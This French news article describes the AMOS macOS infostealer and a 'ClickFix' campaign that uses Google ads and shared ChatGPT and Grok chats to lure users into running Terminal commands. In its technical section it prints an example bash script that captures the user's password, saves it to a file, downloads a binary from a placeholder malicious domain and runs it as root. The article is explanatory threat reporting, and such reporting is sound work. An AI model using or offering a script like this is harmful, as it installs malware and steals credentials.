AMOS Infostealer : Comment les Publicités Google Exploitent ChatGPT et Grok pour Infecter vos Mac
Aurélien Fontevive
Une campagne de malwares inédite utilise des publicités Google pour tromper les utilisateurs et installer l’infostealer AMOS sur macOS.
Une Menace Inédite : Les Publicités Google Piégent les Utilisateurs d’Apple
Selon les chercheurs de Kaspersky, une nouvelle campagne d’infostealer AMOS abuse des publicités Google pour attirer les utilisateurs dans des conversations ChatGPT et Grok qui semblent offrir des “instructions utiles” mais qui mènent finalement à l’installation du malware AMOS sur macOS. Cette attaque, nommée “ClickFix”, représente une évolution inquiétante des techniques d’ingénierie sociale exploitant des plateformes légitimes populaires.
En France, où l’adoption des Mac continue de croître, cette menace est particulièrement préoccupante. Les chercheurs de Huntress ont confirmé que cette campagne ciblait activement des requêtes courantes de dépannage macOS, suggérant une approche coordonnée et systématique des attaquants. L’utilisation d’outils d’IA comme ChatGPT et Grok pour diffuser des instructions malveillantes marque une nouvelle ère dans la cybercriminalité.
Comprendre l’Infostealer AMOS : Une Menace Émergente
AMOS, documenté pour la première fois en avril 2023, est une opération de type “malware-as-a-service” (MaaS) qui loue son infostealer à 1 000 dollars par mois. Ce malware se distingue par son ciblage exclusif des systèmes macOS, le plaçant dans une catégorie rare de menaces informatiques. Dans le paysage français de la cybersécurité, où les Mac étaient traditionnellement considérés comme moins vulnérables, l’émergence d’AMOS représente un changement significatif dans le risque pour les utilisateurs d’Apple.
En 2025, AMOS a évolué pour inclure un module backdoor permettant aux opérateurs d’exécuter des commandes sur les hôtes infectés, d’enregistrer les frappes au clavier et de déposer des charges supplémentaires. Cette capacité de persistance et d’évolution rend le particulièrement dangereux et difficile à éliminer.
Caractéristiques clés d’AMOS :
- Ciblage exclusif des systèmes macOS
- Modèle MaaS à 1 000 $/mois
- Module backdoor pour un contrôle à distance
- Capacité de persistance via LaunchDaemon
- Vol de données sensibles et d’identifiants
Mécanisme de l’Attaque ClickFix : De la Recherche Google à l’Infection
L’attaque ClickFix commence lorsque les victimes recherchent des termes liés à macOS, tels que des questions de maintenance, de résolution de problèmes ou pour Atlas - le navigateur web alimenté par l’IA d’OpenAI pour macOS. Les publicités Google mènent directement vers des conversations ChatGPT et Grok qui ont été partagées publiquement en prévision de l’attaque. Ces conversations sont hébergées sur des plateformes LLM légitimes et contiennent les instructions malveillantes utilisées pour installer le malware.
“Pendant notre enquête, l’équipe Huntress a reproduit ces résultats empoisonnés à travers de multiples variations de la même question, ‘comment effacer les données sur iMac’, ’effacer les données système sur iMac’, ’libérer de l’espace de stockage sur Mac’, confirmant qu’il ne s’agit pas d’un résultat isolé mais d’une campagne d’empoisonnement délibérée et généralisée ciblant des requêtes de dépannage courantes.”
Les chercheurs de Huntress ont constaté que l’attaque exploite la confiance des utilisateurs dans les plateformes d’IA populaires. En présentant des instructions techniques apparemment légitimes, les attaquants parviennent à contourner les mécanismes de défense traditionnels et à persuader les victimes d’exécuter du code malveillous dans leur terminal macOS.
Analyse Technique du Script Malveillant
Lorsque les utilisateurs tombent dans le piège et exécutent les commandes de l’IA chat dans le Terminal macOS, une URL encodée en base64 se décode en un script bash (update) qui charge une fausse boîte de dialogue de demande de mot de passe.
Voici un exemple du type de script malveillant utilisé :
#!/bin/bash
# Script malveillant AMOS
read -p "Entrez votre mot de passe pour mettre à jour votre système : " password
if [[ $password ]]; then
echo "Mot de passe valide, vérification en cours..."
# Stocker le mot de passe
echo $password > /tmp/.pass
# Télécharger et exécuter le malware AMOS
curl -s https://恶意域名.com/amos -o /tmp/amos
chmod +x /tmp/amos
sudo /tmp/amos
else
echo "Mot de passe invalide"
fi
Lorsque le mot de passe est fourni, le script le valide, le stocke et l’utilise pour exécuter des commandes privilégiées, telles que le téléchargement de l’infostealer AMOS et l’exécution du malware avec des privilèges de niveau root. Cette technique exploite la confiance des utilisateurs dans les instructions techniques fournies par des plateformes d’IA réputées.
Impact sur les Utilisateurs Français et les Portefeuilles Cryptographiques
AMOS est déposé dans /Users/$USER/ sous forme de fichier caché (.helper). Lorsqu’il est lancé, il scanne le dossier des applications à la recherche de Ledger Wallet et Trezor Suite. S’il les trouve, il les remplace par des versions truquées qui incitent la victime à saisir sa phrase de seed “pour des raisons de sécurité”.
Portefeuilles cryptographiques ciblés par AMOS :
- Ledger Wallet
- Trezor Suite
- Electrum
- Exodus
- MetaMask
- Ledger Live
- Coinbase Wallet
Cette menace est particulièrement inquiétante en France, où l’adoption des cryptomonnaies continue de croître. En 2025, la France est devenue l’un des marchés européens les plus actifs en matière d’actifs numériques, avec un nombre croissant d’utilisateurs stockant des valeurs substantielles dans des portefeuilles cryptographiques. L’attaque AMOS représente un risque direct pour ces actifs.
En plus des portefeuilles cryptographiques, AMOS cible également :
- Les données de navigateur tels que les cookies, les mots de passe enregistrés, les données de remplissage automatique et les jetons de session
- Les données de chaîne de clés macOS telles que les mots de passe d’applications et les identifiants Wi-Fi
- Les fichiers sur le système de fichiers
Techniques de Persistance et d’Évasion Détection
La persistance est obtenue via un LaunchDaemon (com.finder.helper.plist) exécutant un AppleScript caché qui agit comme une boucle de surveillance, redémarrant le malware en moins d’une seconde s’il est terminé. Cette technique permet au malware de résister aux tentatives de suppression et de continuer à fonctionner même après le redémarrage du système.
Les chercheurs ont également noté qu’AMOS utilise des techniques d’obfuscation pour éviter la détection par les logiciels antivirus traditionnels. En 2025, alors que les solutions de sécurité continuent d’évoluer, les attaquants comme ceux derrière AMOS adaptent constamment leurs techniques pour rester en avance.
Indicateurs de Compromission et Signes d’Infection
Les utilisateurs devraient être vigilants face aux signes suivants qui pourraient indiquer une infection par AMOS :
- Présence de fichiers cachés avec des noms suspects dans le répertoire utilisateur
- Activité réseau inhabitée vers des domaines inconnus
- Modification d’applications de portefeuille cryptographique
- Demandes fréquentes de mot de passe pour des raisons “de sécurité”
- Ralentissement soudain du système ou comportement anormal
Ces indicateurs peuvent aider les utilisateurs et les professionnels de la sécurité à détecter une infection potentielle avant que les dommages ne deviennent irréversibles.
Stratégies de Prévention et de Mitigation
Pour se protéger contre l’attaque ClickFix et d’autres menaces similaires, les utilisateurs et les organisations devraient mettre en œuvre plusieurs stratégies de sécurité :
Sécuriser les Recherches et les Publicités
- Utilisez des bloqueurs de publicités réputés pour réduire le risque d’exposition aux publicités malveillantes
- Vérifiez toujours les URL avant de cliquer sur des résultats de recherche, même s’ils apparaissent en haut des résultats
- Soyez sceptique envers les offres “trop belles pour être vraies” dans les résultats de recherche
Pratiques de Sécurité pour les Utilisateurs de macOS
- Exécutez uniquement des scripts provenant de sources de confiance
- Soyez prudent lorsque vous exécutez des commandes dans Terminal, en particulier celles demandant des privilèges système
- Maintenez votre système et vos applications à jour pour bénéficier des derniers correctifs de sécurité
- Utilisez des outils de sécurité réputés spécifiquement conçus pour macOS
Mesures Organisationnelles
- Mettez en œuvre une formation à la sécurité régulière pour tous les employés
- Utilisez des solutions de protection des points de terminaison avec capacités de détection comportementale
- Surveillez l’activité réseau à la recherche de communications suspectées
- Développez un plan de réponse aux incidents pour faire face aux infections potentielles
Tendances Futures dans la Cybercriminalité Utilisant l’IA
Les dernières attaques ClickFix sont un autre exemple des acteurs des menaces qui expérimentent de nouvelles façons d’exploiter des plateformes légitimes et populaires comme OpenAI et X (anciennement Twitter). L’utilisation de l’IA pour diffuser des instructions malveillantes représente une tendance inquiétante qui pourrait se généraliser en 2025 et au-delà.
Dans le contexte français, où l’adoption de l’IA pour diverses applications professionnelles et personnelles augmente rapidement, cette menace soulève des questions importantes sur la sécurité des plateformes d’IA et la nécessité de mécanismes de validation robustes.
Les chercheurs de Kaspersky ont noté que, même après avoir atteint ces conversations LLM manipulées, une simple question de suivi demandant à ChatGPT si les instructions fournies sont sûres à exécuter révèle qu’elles ne le sont pas. Cela suggère que les utilisateurs peuvent utiliser leurs propres outils d’IA pour valider les instructions suspectées, créant une boucle de vérification potentielle.
Recommandations pour les Développeurs et Fournisseurs d’IA
Pour contrer cette menace émergente, les développeurs et fournisseurs d’IA devraient considérer plusieurs mesures :
Mise en œuvre de systèmes de détection de contenu malveillant : Développer des algorithmes capables d’identifier les instructions potentiellement dangereuses partagées sur leurs plateformes.
Avertissements contextuels : Ajouter des avertissements lorsque des conversations contiennent des commandes système ou des instructions qui pourraient être dangereuses à exécuter.
Limites d’utilisation : Restreindre la capacité de partager des conversations contenant des commandes système sensibles.
Coopération avec les chercheurs en sécurité : Travailler en étroite collaboration avec la communauté de sécurité pour identifier et atténuer rapidement les nouvelles menaces.
Éducation des utilisateurs : Fournir des ressources éducatives pour aider les utilisateurs à reconnaître et éviter les instructions malveillantes.
Conclusion et Prochaines Étapes
L’émergence de campagnes comme ClickFix représente un changement significatif dans la manière dont les attaquants explorent les nouvelles technologies pour compromettre les systèmes. L’utilisation d’outils d’IA populaires pour diffuser des malwares marque une évolution inquiétante qui nécessite une vigilance accrue de la part des utilisateurs, des développeurs et de la communauté de la sécurité.
Pour les utilisateurs français de macOS, cette menace souligne l’importance de maintenir une posture de sécurité proactive. En 2025, alors que l’adoption des Mac et des technologies d’IA continue de croître, la compréhension des menaces émergentes et la mise en œuvre de pratiques de sécurité robustes deviennent plus cruciales que jamais.
La prochaine étape dans la lutte contre ces menaces est une approche collaborative impliquant les utilisateurs, les entreprises de sécurité, les développeurs d’IA et les organismes de réglementation. En travaillant ensemble, nous pouvons créer un écosystème numérique plus sûr pour tous.
“Dans la pratique, nous avons observé que les utilisateurs sont souvent trop confiants dans les instructions fournies par des plateformes d’IA réputées. Cette confiance peut être exploitée, comme le démontre l’attaque AMOS. L’éducation et la vigilance restent nos meilleures défenses.”